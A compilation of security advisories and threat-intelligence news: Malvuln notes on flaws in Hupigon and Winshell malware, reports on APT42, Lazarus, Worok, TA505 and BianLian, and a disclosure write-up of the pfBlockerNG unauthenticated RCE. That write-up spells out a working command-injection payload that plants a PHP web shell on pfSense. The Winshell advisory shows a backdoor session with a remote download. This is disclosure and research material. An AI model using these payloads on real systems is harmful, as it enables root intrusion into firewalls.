Backdoor.Win32.Hupigon.aspg malware suffers from an unquoted service path vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/121bf601275e2aed0c3a6fe7910f9826.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Hupigon.aspgVulnerability: Insecure Service PathDescription: The malware creates a service with an unquoted path. Attackers who can place an arbitrary executable named "Program.exe" under c:\ drive can potentially undermine the malware by having it run theirs instead with LocalSystem privs.Family: HupigonType: PE32MD5: 121bf601275e2aed0c3a6fe7910f9826Vuln ID: MVID-2022-0634Disclosure: 09/06/2022Exploit/PoC:C:\dump>sc qc VServer_2007[SC] QueryServiceConfig SUCCESSSERVICE_NAME: VServer_2007        TYPE               : 110  WIN32_OWN_PROCESS (interactive)        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 0   IGNORE        BINARY_PATH_NAME   : C:\Program Files\Common Files\Microsoft Shared\MSInfo\R_Server.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : V_Server        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystemDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Hupigon.aspg MVID-2022-0634 Unquoted Service Path

Backdoor.Win32.Winshell.5_0 malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/5bc5f72d19019a2fa3b75896e82ae1e5.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Winshell.5_0Vulnerability: Weak Hardcoded CredentialsDescription: The malware is UPX packed, listens on TCP port 5277 and requires authentication for remote access. However, the password "123456789" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.Family: WinshellType: PEMD5: 5bc5f72d19019a2fa3b75896e82ae1e5Vuln ID: MVID-2022-0633Disclosure: 09/06/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 5277Password:123456789WinShell v5.0 (C)2002 janker.org? for helpCMD>?i Installr Removep Pathb reBootd shutDowns Shellx eXitq QuitDownload:CMD>http://.../srv.exe? for helpCMD>sMicrosoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\dump>Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Winshell.5_0 MVID-2022-0633 Hardcoded Credential

APT42 is posing as a friend to people considered threats to the government, using a raft of different tools to steal relevant info and perform surveillance.

A well-resourced advanced persistent threat (APT) group aligned with Iran's Revolutionary Guard Corps Intelligence Organization (IRGC-IO) and active since 2015 is targeting perceived threats to the Iranian government with sophisticated cybercriminal and surveillance operations, based on social engineering and fraudulent trust relationships.  

APT42, believed to be a subset of APT35/Charming Kitten/Phosphorus, uses highly targeted spear-phishing and social-engineering techniques in which they get victims to trust them, according to a blog post and detailed report (PDF) by Mandiant released Wednesday.

The goal is to exploit those relationships to steal personal info and credentials, after which the group then moves deeper into corporate networks, or targets colleagues or family of the victim to steal yet more data and perform other nefarious activities.

APT42 also engages in surveillance by installing Android spyware on mobile devices to keep a constant eye on targets. This is to ensure "regime stability by monitoring, and subsequently even arresting, those they deem to be a threat to the regime," Mandiant researchers told Dark Reading.

Threat actors also sometimes use Windows malware to complement these primary methods of attack, researchers said. Indeed, APT42 is capable of conducting multiple types of operations at any given time, Mandiant researchers told Dark Reading, which is somewhat unique. The group has already been identified as the perpetrator in about 30 known campaigns — a number that Mandiant suspects is a low estimate.

"Not only does APT42 conduct 'traditional' cyber-espionage activity targeting organizations in order to obtain information of strategic relevance to the Iranian government, the group also conducts targeted surveillance operations against individuals," researchers said in an email interview.

In terms of threats to the private sector, "APT42 has a propensity to target both personal and corporate email accounts of individuals and organizations of interest," they told Dark Reading. "They also change their targeting patterns over time as Iranian government priorities change."

Here at home, current and former US government officials and researchers at think tanks and in academia involved in Iran-relevant policy-making or research already have been targets of APT42, and this activity is not likely to cease, researchers said. In fact, the group may even cast a wider net and extended its activities to government contractors working on the same Iran-related issues, researchers told Dark Reading.

**3 Stages of Threat Activity**

APT42 has three main areas of threat activity. Initial compromise is done via credential harvesting, using targeted spear-phishing campaigns that emphasize developing trust with the victim beforehand. This is done by impersonating journalists or other professionals that a victim might trust or want to connect with.

The group then uses this entry method to collect multifactor authentication (MFA) codes so they can bypass security protections and pursue deeper access to the networks, devices, and the accounts of employers, colleagues, and relatives to steal information that might be relevant to the government.

The second key activity of the group is to conduct surveillance operations through Android mobile malware that tracks locations, monitors communications, and keeps track of the activities of dissidents and other people of interest to the government.

Finally, the group also has in its arsenal a raft of malware, including custom backdoors and other "lightweight" tools that it uses for operations that go beyond credential harvesting, researchers said.

**Connections to Other Threat Groups**

The state-backed APT has been on the radar screen for security researchers since it commenced operations in 2015. It's tracked via a number of nomenclatures by different companies, including TA453 (Proofpoint), Yellow Garuda (PricewaterhouseCoopers), and ITG18 (IBM).

APT42 also has connections to and is likely a subset of APT35, the prolific group better known as Charming Kitten, but it has a different set of goals, researchers said.

Charming Kitten focuses more on long-term, malware-intensive operations targeting organizations and companies in the United States and Middle East to steal data to support the Iranian military and government operations. APT42, in contrast, targets specific individuals and organizations that the regime has its eye on for the purpose of domestic politics, foreign policy, and regime stability, researchers said.

**Specific, Agile State-Sponsored Cyber Campaigns**

Over the years, researchers have identified specific campaigns linked to APT42 and occasionally attributed to APT35/Charming Kitten/Phosphorus, due to the complexity of tracking the group's numerous operations, and the differences in how threat actors are identified.

A phishing campaign tied to APT42 and dubbed "Operation SpoofedScholars" occurred last year, with the group impersonating scholars with the University of London's School of Oriental and African Studies (SOAS). The operation targeted individuals focused on Middle East affairs in the United States and the United Kingdom to gain access to personal email inboxes.

Earlier this year, APT42 impersonated a legitimate British news organization in a February campaign targeting professors in Belgium and the United Arab Emirates that had ties to local governments or relatives holding dual citizenship in Iran, according to Mandiant. The activity obtained the personal email credentials of its targets, luring them by using a customized PDF document that invited them to an online interview, but instead linking them to a Gmail credential-harvesting page.

In addition to targeting scholars and journalists, APT42 also shows versatility and agility in its operations, researchers said. It was among threat groups that jumped on the bandwagon of targeting researchers in the pharmaceutical sector during the COVID-19 pandemic, with a campaign that occurred in its initial phase in March 2020, according to Mandiant.

"This indicates that APT42 is trusted by the Iranian government to quickly react to geopolitical changes by adjusting their flexible operations to targets of operational interest to Tehran," researchers said.

**Who's at Risk?**

Iran, like China and Russia, has a raft of threat actors at its service to conduct malicious cyber activity against organizations and individuals that the government has identified are threats. Its current offensive stance and rising cyber conflict with the United States is due to the unique position in geopolitics that the country currently occupies, Mandiant researchers told Dark Reading.

"The combination of regional tensions, the nuclear deal's negotiations, and domestic unrest about economic and social issues create an environment in which a group such as APT42 thrives," researchers said.

The group’s ability to pivot depending on the intentions of the government will continue to pose an immediate threat to both individuals and organizations globally, with global events and local politics continuing to drive operations and targeting priorities, Mandiant researchers said.

Iran-Linked APT Cozies Up to 'Enemies' in Trust-Based Spy Game

The prolific North Korean nation-state actor known as the Lazarus Group has been linked to a new remote access trojan called MagicRAT.
The previously unknown piece of malware is said to have been deployed in victim networks that had been initially breached via successful exploitation of internet-facing VMware Horizon servers, Cisco Talos said in a report shared with The Hacker News.
"While being

The prolific North Korean nation-state actor known as the Lazarus Group has been linked to a new remote access trojan called **MagicRAT**.

The previously unknown piece of malware is said to have been deployed in victim networks that had been initially breached via successful exploitation of internet-facing VMware Horizon servers, Cisco Talos said in a report shared with The Hacker News.

"While being a relatively simple RAT capability-wise, it was built with recourse to the Qt Framework, with the sole intent of making human analysis harder, and automated detection through machine learning and heuristics less likely," Talos researchers Jung soo An, Asheer Malhotra, and Vitor Ventura said.

Lazarus Group, also known as APT38, Dark Seoul, Hidden Cobra, and Zinc, refers to a cluster of financial motivated and espionage-driven cyber activities undertaken by the North Korean government as a means to sidestep sanctions imposed on the country and meet its strategic objectives.

Like other umbrella collectives Winnti and MuddyWater, the state-sponsored hacking collective also has "spin-off" groups such as Bluenoroff and Andariel, which focus on specific kinds of attacks and targets.

While the Bluenoroff subgroup is focused on attacking foreign financial institutions and perpetrating monetary theft, Andariel is devoted in its pursuit of South Korean organizations and businesses.

"Lazarus develops their own attack tools and malware, can use innovative attack techniques, works very methodically, and takes their time," cybersecurity firm NCC Group said in a report detailing the threat actor.

"In particular, the North Korean methods aim to avoid detection by security products and to remain undetected within the hacked systems for as long as possible."

The latest addition to its wide-ranging malware toolset shows the group's ability to employ a multitude of tactics and techniques depending on their targets and their operational goals.

A C++-based implant, MagicRAT is designed to achieve persistence by creating scheduled tasks on the compromised system. It's also "rather simple" in that it provides the attacker with a remote shell to execute arbitrary commands and carry out file operations.

MagicRAT is also capable of launching additional payloads retrieved from a remote server on infected hosts. One of the executables retrieved from the command-and-control (C2) server takes the form of a GIF image file, but in reality is a lightweight port scanner.

Furthermore, the C2 infrastructure associated with MagicRAT has been found harboring and serving newer versions of TigerRAT, a backdoor formerly attributed to Andariel and is engineered to execute commands, take screenshots, log keystrokes, and harvest system information.

Also incorporated in the latest variant is a USB Dump feature that allows the adversary to hunt for files with specific extensions, alongside laying the groundwork for implementing video capture from webcams.

"The discovery of MagicRAT in the wild is an indication of Lazarus' motivations to rapidly build new, bespoke malware to use along with their previously known malware such as TigerRAT to target organizations worldwide," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Deploying New MagicRAT Malware in Targeted Campaigns

The threat actor — whose techniques and procedures do not match known groups — has created custom attack tools, including a program that hides scripts in .PNG images.

A relatively new cyber-espionage group is using an intriguing custom arsenal of tools and techniques to compromise companies and governments in Southeast Asia, the Middle East, and southern Africa, with attacks aimed at collecting intelligence from targeted organizations.

According to an analysis published on Tuesday by cybersecurity firm ESET, the hallmark of the group, which is dubbed Worok, is its use of custom tools not seen in other attacks, a focus on targets in Southeast Asia, and operational similarities to the China-linked TA428 group.

In 2020, the group attacked telecommunications companies, government agencies, and maritime firms in the region before taking a months-long break. It restarted operations at the beginning of 2022.

ESET issued the advisory on the group because the company's researchers have not seen many of the tools used by any other group, says Thibaut Passilly, a malware researcher with ESET and author of the analysis.

"Worok is a group that uses exclusive and new tools to steal data — their targets are worldwide and include private companies, public entities, as well as governmental institutions," he says. "Their usage of various obfuscation techniques, especially steganography, makes them really unique."

**Worok's Custom Toolset**

Worok bucks the more recent trend of attackers using cybercriminal services and commodity attack tools as these offerings have blossomed on the Dark Web. The proxy-as-a-service offering EvilProxy, for example, allows phishing attacks to bypass two-factor authentication methods by capturing and modifying content on the fly. Other groups have specialized in specific services such as initial access brokers, which allow state-sponsored groups and cybercriminals to deliver payloads to already-compromised systems.

Worok's toolset instead consists of an in-house kit. It includes the CLRLoad C++ loader; the PowHeartBeat PowerShell backdoor; and a second-stage C# loader, PNGLoad, that hides code in image files using steganography (although researchers have not yet captured an encoded image).

For command and control, PowHeartBeat currently uses ICMP packets to issue commands to compromised systems, including running commands, saving files, and uploading data.

While the targeting of the malware and the use of some common exploits — such as the ProxyShell exploit, which has been actively used for more than a year — are similar to existing groups, other aspects of the attack are unique, Passilly says.

"We have not seen any code similarity with already known malware for now," he says. "This means they have exclusivity over malicious software, either because they make it themselves or they buy it from a closed source; hence, they have the ability to change and improve their tools. Considering their appetite for stealthiness and their targeting, their activity must be tracked."

**Few Links to Other Groups**

While the Worok group has aspects that resemble TA428, a Chinese group that has run cyber-operations against nations in the Asia-Pacific region, the evidence is not strong enough to attribute the attacks to the same group, ESET says. The two groups may share tools and have common goals, but they are distinct enough that their operators are likely different, Passilly says.

"\[W\]e have observed a few common points with TA428, especially the usage of ShadowPad, similarities in the targeting, and their activity times," he says. "These similarities are not that significant; therefore we link the two groups with low confidence."

For companies, the advisory is a warning that attackers continue to innovate, Passilly says. Companies should track the behavior of cyber-espionage groups to understand when their industry might be targeted by attackers.

"The first and most important rule to protect against cyberattacks is to keep software updated in order to reduce the attack surface, and use multiple layers of protections to prevent intrusions," Passilly says.

Mysterious 'Worok' Group Launches Spy Effort With Obfuscated Code, Private Tools

What under-the-hood details of newly discovered attack control panel tells us about how the Evil Corp threat group manages its ServHelper backdoor malware campaigns.

A newly discovered cyberattack panel dubbed TeslaGun has been discovered, used by Evil Corp to run ServHelper backdoor campaigns.  

Data gleaned from an analysis by the Prodraft Threat Intelligence (PTI) team shows the Evil Corp ransomware gang (aka TA505 or UNC2165, along with half a dozen other colorful tracking names) has used TeslaGun to carry out mass phishing campaigns and targeted campaigns against more than 8,000 different organizations and individuals. The majority of targets have been in the US, which accounted for more than 3,600 of the victims, with a scattered international distribution outside of that.

There has been a continued expansion of the ServHelper backdoor malware, a long-running and constantly updated package that's been kicking around since at least 2019. It began picking up steam once again in the second half of 2021, according to a report from Cisco Talos, spurred by mechanisms like fake installers and associated installer malware like Raccoon and Amadey. 

Most recently, threat intelligence from Trellix last month reported that the ServHelper backdoor has recently been found dropping hidden cryptominers on systems.

The PTI report, issued Tuesday, delves into the technical specifics behind TeslaGun, and offers some details and tips that can help enterprises move forward with important countermeasures to some of the prevailing backdoor cyberattack trends today.

Backdoor attacks that circumvent authentication mechanisms and quietly establish persistence on enterprise systems are some of the most disconcerting for cybersecurity defenders. That's because these attacks are notoriously difficult to detect or prevent with standard security controls. 

**Backdoor Attackers Diversify Their Attack Assets**

PTI researchers said they observed a wide range of different victim profiles and campaigns during their investigations, supporting previous research that showed ServHelper attacks are trawling for victims in a variety of simultaneous campaigns. This is a trademark attack pattern of casting a wide net for opportunistic hits.

"A single instance of the TeslaGun control panel contains multiple campaign records representing different delivery methods and attack data," the report explained. "Newer versions of the malware encode these different campaigns as campaign IDs."

**But Cyberattackers Will Actively Profile Victims**

At the same time, TeslaGun contains plenty of evidence that attackers are profiling victims, taking copious notes at some points, and conducting targeted backdoor attacks.

"The PTI team observed that the main dashboard of the TeslaGun panel includes comments attached to victim records. These records show victim device data such as CPU, GPU, RAM size and internet connection speed," the report said, explaining this indicates targeting for cryptomining opportunities. "On the other hand, according to victim comments, it is clear that TA505 is actively looking for online banking or retail users, including crypto-wallets and e-commerce accounts."

The report said that most victims appear to operate in the financial sector but that this targeting is not exclusive.

**Resale Is an Important Part of Backdoor Monetization**

The way that the control panel's user options are set up offered researchers a lot of information about the group's "workflow and commercial strategy," the report said. For example, some filtering options were labeled "Sell" and "Sell 2" with victims in these groups having remote desktop protocols (RDP) temporarily disabled through the panel.

"This probably means that TA505 can not immediately earn a profit from exploiting those particular victims," according to the report. "Instead of letting them go, the group has tagged those victim’s RDP connections for the resale to other cybercriminals."

The PTI report said that based on the researchers' observations, the group's internal structure was "surprisingly disorganized" but that its members still "carefully monitor their victims and can demonstrate remarkable patience, especially with high-value victims in the finance sector."

The analysis further notes that the strength of the group is its agility, which makes it hard to predict activity and detect over time.

Nevertheless, the backdoor attackers aren't perfect, and this can offer some clues for cybersecurity pros looking to thwart their efforts.

"The group does exhibit some telltale weaknesses, however. While TA505 can maintain hidden connections on victims’ devices for months, its members are often unusually noisy," the report said. "After installing ServHelper, TA505 threat actors may manually connect to victim devices through RDP tunneling. Security technologies capable of detecting these tunnels may prove vital for catching and mitigating TA505's backdoor attacks."

The Russian-linked (and sanctioned) Evil Corp has been one of the most prolific groups of the last five years. According to the US government, the group is the brain trust behind the financial Trojan Dridex and has associations with campaigns using ransomware variants like WastedLocker. It continues to hone a raft of weapons for its arsenal as well; last week, it came to light that it's associated with Raspberry Robin infections.

TeslaGun Primed to Blast a New Wave of Backdoor Cyberattacks

High-profile companies and local governments located primarily in Asia are the subjects of targeted attacks by a previously undocumented espionage group dubbed Worok that has been active since late 2020.
"Worok's toolset includes a C++ loader CLRLoad, a PowerShell backdoor PowHeartBeat, and a C# loader PNGLoad that uses steganography to extract hidden malicious payloads from PNG files," ESET

High-profile companies and local governments located primarily in Asia are the subjects of targeted attacks by a previously undocumented espionage group dubbed **Worok** that has been active since late 2020.

"Worok's toolset includes a C++ loader CLRLoad, a PowerShell backdoor PowHeartBeat, and a C# loader PNGLoad that uses steganography to extract hidden malicious payloads from PNG files," ESET researcher Thibaut Passilly said in a new report published today.

Worok is said to share overlaps in tools and interests with another adversarial collective tracked as TA428, with the group linked to attacks against entities spanning energy, financial, maritime, and telecom sectors in Asia as well as a government agency in the Middle East and a private firm in southern Africa.

Malicious activities undertaken by the group experienced a noticeable break from May 2021 to January 2022, before resuming the next month. The Slovak cybersecurity firm assessed the group's goals to be aligned with information theft.

Initial foothold to target networks through 2021 and 2022 entailed the use of ProxyShell exploits in select instances, followed by deploying additional custom backdoors for entrenched access. Other initial compromise routes are unknown as yet.

Among the tools in Worok's malware arsenal is a first-stage loader called CLRLoad, which is succeeded by a .NET-based steganographic loader codenamed PNGLoad that's capable of executing an unknown PowerShell script embedded in a PNG image file.

Infection chains in 2022 have since dropped CLRLoad in favor of a full-featured PowerShell implant referred to as PowHeartBeat that's subsequently used to launch PNGLoad, in addition to communicating with a remote server via HTTP or ICMP to execute arbitrary commands, send and receive files, and carry out related file operations.

ESET said it was unable to retrieve any of the final-stage PNG payloads, although it's suspected that the malware could be concealed in valid, innocuous-looking PNG images and therefore "hide in plain sight" without attracting attention.

"Worok is a cyber espionage group that develops its own tools, as well as leveraging existing tools, to compromise its targets," Passilly said.

"Stealing information from their victims is what we believe the operators are after because they focus on high-profile entities in Asia and Africa, targeting various sectors, both private and public, but with a specific emphasis on government entities."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Worok Hackers Target High-Profile Asian Companies and Governments

Cybersecurity researchers have offered insight into a previously undocumented software control panel used by a financially motivated threat group known as TA505.
"The group frequently changes its malware attack strategies in response to global cybercrime trends," Swiss cybersecurity firm PRODAFT said in a report shared with The Hacker News. "It opportunistically adopts new technologies in order

Cybersecurity researchers have offered insight into a previously undocumented software control panel used by a financially motivated threat group known as TA505.

"The group frequently changes its malware attack strategies in response to global cybercrime trends," Swiss cybersecurity firm PRODAFT said in a report shared with The Hacker News. "It opportunistically adopts new technologies in order to gain leverage over victims before the wider cybersecurity industry catches on."

Also tracked under the names Evil Corp, Gold Drake, Dudear, Indrik Spider, and SectorJ04, TA505 is an aggressive Russian cybercrime syndicate behind the infamous Dridex banking trojan and which has been linked to a number of ransomware campaigns in recent years.

It's also said to be connected to the Raspberry Robin attacks that emerged in September 2021, with similarities uncovered between the malware and Dridex.

Other notable malware families associated with the group include FlawedAmmyy, Neutrino botnet, and a backdoor codenamed ServHelper, one variant of which is capable of downloading a remote access trojan called FlawedGrace.

The control panel, called TeslaGun, is said to be used by the adversary to manage the ServHelper implant, working as a command-and-control (C2) framework to commandeer the compromised machines.

Additionally, the panel offers the ability for the attackers to issue commands, not to mention send a single command to all victim devices in go or configure the panel such that a predefined command is automatically run when a new victim is added to the panel.

"The TeslaGun panel has a pragmatic, minimalist design. The main dashboard only contains infected victim data, a generic comment section for each victim, and several options for filtering victim records," the researchers said.

Aside from using the panel, the threat actors are also known to employ a remote desktop protocol (RDP) tool to manually connect to the targeted systems via RDP tunnels.

PRODAFT's analysis of TeslaGun victim data shows that the group's phishing and targeted campaigns have hit at least 8,160 targets since July 2020. A majority of those victims are located in the U.S. (3,667), followed by Russia (647), Brazil (483), Romania (444), and the U.K. (359).

"It is clear that TA505 is actively looking for online banking or retail users, including crypto-wallets and e-commerce accounts," the researchers noted, citing comments made by the adversarial group in the TeslaGun panel.

The findings also come as the U.S. Department of Health and Human Services (HHS) warned of significant threats posed by the group to the health sector via data exfiltration attacks that aim to steal intellectual property and ransomware operations.

"Evil Corp has a wide set of highly-capable tools at their disposal," the agency's Health Sector Cybersecurity Coordination Center (HC3) said in an advisory published late last month.

"These are developed and maintained in-house, but are often used in conjunction with commodity malware, living-off-the-land techniques and common security tools that were designed for legitimate and lawful security assessments."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

TA505 Hackers Using TeslaGun Panel to Manage ServHelper Backdoor Attacks

pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.

**TL;DR**

IHTeam undertook an independent security assessment of pfsense’s pfBlockerNG plugin version 2.1.4\_26 and identified the following vulnerability:

*   Unauthenticated Remote Command Execution as root (CVE-2022-31814)

**What’s pfBlockerNG**

pfBlockerNG (https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html) is a pfSense plugin that is NOT installed by default and it’s generally used to block inbound connections from whole countries or IP ranges.

**CVE-2022-31814**

IHTeam identified a remote command execution vulnerability in **pfBlockerNG <= 2.1.4\_26** that can be exploited from an unauthenticated perspective.

Fig 1: Image showing the installed pfBlockerNG plugin

Being the web server run by the root user, the impact of this vulnerability is critical, with a CVSS 3.0 score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

The consultant downloaded the latest stable version of pfSense (2.6.0 at the moment of writing) and installed the latest stable version of pfBlockerNG (2.1.4\_26 at the moment of writing).

The vulnerability was identified in the file **/usr/local/www/pfblockerng/www/index.php** which is used to record and query DNSBL data. Specifically to query, the code uses PHP function **exec()**, passing untrusted data into the command.

    // Query DNSBL Alias for Domain List.
    $query = str_replace('.', '\.', htmlspecialchars($_SERVER['HTTP_HOST']));
    
    exec("/usr/bin/grep -l ' \"{$query} 60 IN A' /var/db/pfblockerng/dnsblalias/*", $match);

The **$\_SERVER\[‘HTTP\_HOST’\]** element passed in the above code, is a user-controllable input that could result in changing the meaning of the command (as originally intended). An attacker can tamper with the HTTP\_HOST parameter via the “**Host**:” header of the request, as shown in the picture below:

Fig 2: Image showing the “Host” header value reflected in command

—**Restrictions on characters**—

There were few restrictions in place regarding characters you could use:

*   htmlspecialchars() PHP function was preventing the use of shell redirections (> and <), double quotes (“), and ampersand (&)

Fig 3: Image showing how “&” was encoded in HTML when used

*   nginx web server won’t accept the forward slash (/) in the Host header, returning a 400 – Bad Request

Fig 4: Image showing nginx returning 400

Therefore, the only available characters to build a working payload were:

*   pipe (|)
*   semicolon (;)
*   single quote (‘)
*   spaces ( )

**–Simple proof of concept–**

To easily identify a valid payload, we can copy the original command in the exec() function and try to tamper with it directly in a shell:

    /usr/bin/grep -l ' "INJECTION 60 IN A' /var/db/pfblockerng/dnsblalias/*

In order to obtain a working PoC, we need:

1.  Close the single quote
2.  Specify a directory to search on
3.  Break the command with a semicolon
4.  Comment or add an additional single quote

    ' *; sleep 5; '

The above simple proof of concept made the system delay the request for 5 seconds, confirming the injection worked.

**–Backdooring pfSense–**

The next step would involve the build of a stable shell on the remote machine and to do so, we would need to find a creative way to (at least) write a PHP file.

Remember that we can’t use redirections or even forward slashes, therefore the consultant utilized base64 to write a more complex payload that could be executed via php-cli.

However, the “base64 -d” binary was not installed by default in pfSense, but python3.8 was, therefore we were able to write and decode base64 payloads and pipe everything in the php-cli binary:

*   Simple PHP code

    <?echo("HELL");?>

*   Encode it in base64

    PD9lY2hvKCJIRUxMIik7Pz4=

*   Use python to decode the base64

    python3.8 -m base64 -d

*   Pipe everything into PHP

    | php

Fig 5: Image showing the “echo” message successfully executed by PHP

Keep in mind that base64 has forward slashes (/) in its charset – therefore build a payload that doesn’t include them.

Now that we got back the “HELL” message, we know that PHP successfully executed our payload, we can build a more complex payload to backdoor pfSense.

    <?$a=fopen("/usr/local/www/system_advanced_control.php","w") or die();$t='<?php print(passthru( $_GET["c"]));?>';fwrite($a,$t);fclose( $a);?>

It creates a file in **/usr/local/www/system\_advanced\_control.php** with a very simple call to execute command and get back results from it.

    PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+

Once again, the above payload, encoded in base64, did not contain any forward slashes. Hence, the final payload to obtain a backdoor in pfSense would be as follow:

    /usr/bin/grep -l ' "' * ; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBlY2hvKGV4ZWMoJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSgkYSk7Pz4=' | python3.8 -m base64 -d | php ; ' 60 IN A' /var/db/pfblockerng/dnsblalias/*

**Exploit Code**

The exploit code can be found at https://iht.li/p/WWATN

Fig 6: Image showing the exploit execution

**Disclosure Timeline**

28/05/2022 – Technical details sent to \[email protected\]  
31/05/2022 – No response from NetGate, directly contacted BBcan177 (maintainer of the package in GitHub)  
05/06/2022 – BBcan177 released a temporary patch https://github.com/pfsense/FreeBSD-ports/pull/1169 while waiting to deprecate version 2.x in favor of 3.x  
07/06/2022 – NetGate came back saying they don’t issue security advisories for vulnerabilities within Packages, especially community-maintained packages such as pfBlockerNG.  
–3 months delay to allow clients to patch–  
05/09/2022 – Blog post and exploit published

CVE-2022-31814: pfBlockerNG Unauth RCE Vulnerability - IHTeam Security Blog

The operators of the emerging cross-platform ransomware BianLian increased their command and control infrastructure this month, indicating an acceleration in their operational pace.

A new player to the ransomware space called BianLian is ramping up activity, and has already targeted organizations in Australia, North America, and the United Kingdom.

According to an advisory from cybersecurity firm Redacted, there has been a "troubling" rise in the rate at which BianLian is bringing new command-and-control (C&C) servers online.

The ransomware was created with Golang (Go), the Google-created open source programming language, and targets SonicWall VPN devices and the Microsoft Exchange Server ProxyShell vulnerability chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).

"While we lack the insight to know the exact cause for this sudden explosion in growth, this may signal that they are ready to increase their operational tempo, though whatever the reason, there is little good that comes from a ransomware operator having more resources available to them," the researchers noted in the Friday post.

BianLian has been rising popularity since it was first outed in mid-July, according to researchers at Cyble Research Labs, which published details on the ransomware last month.

**The BianLian Ransomware Attack Flow**

To begin its attacks, the ransomware gang leverages the access gained through the ProxyShell vulnerabilities to install a Web shell or ngrok payload for monitoring activities. The group has been taking care to avoid detection and minimize observable events as it hunts for data and identifies machines to encrypt, researchers said.

In a campaign observed by Redacted, once in, BianLian most often utilized standard "living off the land" (LoL) techniques for network profiling and lateral movement, the report noted. These included net.exe to add and/or modify user permissions; netsh.exe to configure host firewall policies; and reg.exe to adjust various registry settings related to remote desktop and security policy enforcement.

In addition to leveraging the LoL techniques, the group is also known to deploy a custom implant as an alternative means to maintain persistent network access. The main objective of this "simple but effective" backdoor is to retrieve arbitrary payloads from a remote server, load them into memory, and then execute them.

"BianLian have shown themselves to be adept with the methodology to move laterally, adjusting their operations based on the capabilities and defenses they encountered in the network," the report stated.

BianLian, like other new cross-platform ransomware such as Agenda, Monster, and RedAlert, is also able to start servers in Windows Safe Mode to execute its file-encrypting malware while remaining undetected by security solutions installed on the system. Other measures taken to circumvent security barriers include deleting snapshots, purging backups, and running its Golang encryption module via Windows Remote Management (WinRM) and PowerShell scripts.

The group's emergence adds to the growing number of threats using Go as a base language, allowing adversaries to make quick changes in a single code base that can then be compiled for multiple platforms.

**Ransomware Runs Wild**

Acronis' mid-year cyber-threats report found that ransomware continues to be the top threat to large and midsize businesses, including government organizations, while research from Sophos indicates ransomware gangs may be working in concert to orchestrate multiple attacks.

Further complicating the security landscape is the emergence of data marketplaces that make it easier for threat actors to find and use data exfiltrated during ransomware attacks in follow-up attacks.

Despite the growing risk level and sophistication of ransomware attacks, ransomware coverage is lacking even among businesses with cyber insurance, according to a BlackBerry survey.

The Redacted advisory recommended using a layered approach when trying to mitigate the threat posed by ransomware actors.

"Focus needs to be placed on reducing your attack surface to avoid the most common types of exploitation techniques, but also preparing to act quickly and effectively when a compromise inevitably happens," the report said.

The foundation of this strategy includes multifactor authentication (MFA), secure backups, and an incident response plan.

Tag

#backdoor